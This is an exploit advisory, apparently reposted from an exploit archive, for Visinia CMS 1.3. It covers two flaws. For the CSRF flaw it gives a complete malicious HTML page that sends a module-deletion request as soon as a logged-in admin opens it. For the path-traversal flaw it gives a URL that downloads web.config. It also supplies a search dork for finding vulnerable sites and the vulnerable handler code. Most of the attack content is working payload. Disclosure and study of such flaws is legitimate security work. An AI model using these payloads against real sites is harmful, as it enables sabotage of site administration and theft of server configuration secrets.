Visinia 1.3 Multiple Vulnerabilities
<!DOCTYPE HTML PUBLIC ‘-//W3C//DTD HTML 4.01 Transitional//EN’><html><head><meta http-equiv=’Content-Type’ content=’text/html; charset=windows-1251′><title>Visinia 1.3 Multiple Vulnerabilities</title><link rel=’shortcut icon’ href=’/favicon.ico’ type=’image/x-icon’><link rel=’alternate’ type=’application/rss+xml’ title=’Inj3ct0r RSS’ href=’/rss’></head><body><pre>====================================
Visinia 1.3 Multiple Vulnerabilities
====================================
Title : Visinia Multiple Vulnerabilities
Affected Version : Visinia 1.3
Discovery : www.abysssec.com
Vendor : http://www.visinia.com/
Download Links : http://visinia.codeplex.com/releases
Dork : "Powered by visinia"
Admin Page : http://Example.com/Login.aspx
Description :
===========================================================================================
This version of Visinia have Multiple Valnerabilities :
1- CSRF for Remove Modules
2- LFI for download web.config or any file
CSRF for Remove Modules:
===========================================================================================
With this vulnerability you can navigate the admin to visit malicious site (when he is already logged in)
to remove a Module with a POST request to server.
In this path the Module will be removed:
http://Example.com/Admin/Pages/System/Modules/ModuleController.aspx?DeleteModule=True&ModuleId=159
for removing other modules you need to just change ModuleId.
The Source of HTML Page (Malicious script) is here:
—————————————————————————————-
<html>
<head>
<title >Wellcome to My Site!</title>
Hello!
…
…
…
This page remove Modules in Visinia CMS.
<script>
function RemoveModule() {
try {
netscape.security.PrivilegeManager.enablePrivilege("UniversalXPConnect");
} catch (e) {}
var http = false;
if (window.XMLHttpRequest) {
http = new XMLHttpRequest();
}
else if (window.ActiveXObject) {
http = new ActiveXObject("Microsoft.XMLHTTP");
}
url = "http://Example.com/Admin/Pages/System/Modules/ModuleController.aspx?DeleteModule=True&ModuleId=159";
http.onreadystatechange = done;
http.open(‘POST’, url, true);
http.send(null);
}
function done() {
if (http.readyState == 4 && http.status == 200)
{
}
}
</script>
</head>
<body onload ="RemoveModule();">
</body>
</html>
—————————————————————————————-
File Disclosure Vulnerability:
===========================================================================================
using this path you can download web.config file from server.
http://Example.com/image.axd?picture=viNews/../../web.config
The downloaded file is image.axd, while after downloading you find that the content of
image.axd is web.config.
Vulnerable Code is in this DLL : visinia.SmartEngine.dll
and this Method : ProcessRequest(HttpContext context)
——————————————————————–
public void ProcessRequest(HttpContext context)
{
if (!string.IsNullOrEmpty(context.Request.QueryString["picture"]))
{
string fileName = context.Request.QueryString["picture"]; // Give the file from URL
string folder = WebRoots.GetResourcesRoot();
try
{
FileInfo fi = new FileInfo(context.Server.MapPath(folder) + fileName);
int index = fileName.LastIndexOf(".") + 1;
string extension = fileName.Substring(index).ToLower();
if (string.Compare(extension, "jpg") == 0)
{
context.Response.ContentType = "image/jpeg";
}
else
{
context.Response.ContentType = "image/" + extension;
}
context.Response.TransmitFile(fi.FullName); // Put the file in ‘Response’ for downloading without any check
}
catch
{
}
}
}
# <a href=’http://inj3ct0r.com/’>Inj3ct0r.com</a> [2010-09-03]</pre><script type=’text/javascript’>var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");document.write(unescape("%3Cscript src=’" + gaJsHost + "google-analytics.com/ga.js’ type=’text/javascript’%3E%3C/script%3E"));</script><script type=’text/javascript’>try{var pageTracker = _gat._getTracker("UA-12725838-1");pageTracker._setDomainName("none");pageTracker._setAllowLinker(true);pageTracker._trackPageview();}catch(err){}</script></body></html>
Source: http://inj3ct0r.com/exploits/13957
Leave a Reply